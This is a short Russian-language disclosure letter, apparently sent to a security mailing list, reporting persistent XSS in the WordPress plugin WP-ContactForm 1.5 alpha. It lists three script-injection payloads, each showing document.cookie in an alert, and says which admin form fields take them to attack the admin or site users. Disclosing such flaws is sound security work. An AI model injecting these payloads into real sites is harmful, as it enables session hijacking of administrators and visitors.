Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в WP-ContactForm. Это плагин для WordPress.
Данные уязвимости - это persistent XSS. Уязвима версия плагина WP-ContactForm 1.5 alpha (и предыдущие).
Ранее я уже писал про уязвимости в WP-ContactForm (http://websecurity.com.ua/948/) (в оригинальной версии) и в новой версии плагина (сделанной другим автором) - WP-ContactForm CAPTCHA bypass (http://websecurity.com.ua/1599/) и XSS in WP-ContactForm (http://websecurity.com.ua/1600/).
XSS:
POST запрос на странице http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php:
"><script>alert(document.cookie)</script>
В полях: E-mail Address, Subject - для атаки только на админа.
<script>alert(document.cookie)</script>
В полях: Success Message, Error Message - для атаки на пользователей.
</textarea><script>alert(document.cookie)</script>
В полях: Success Message, Error Message - для атаки на админа и на пользователей.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1641/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua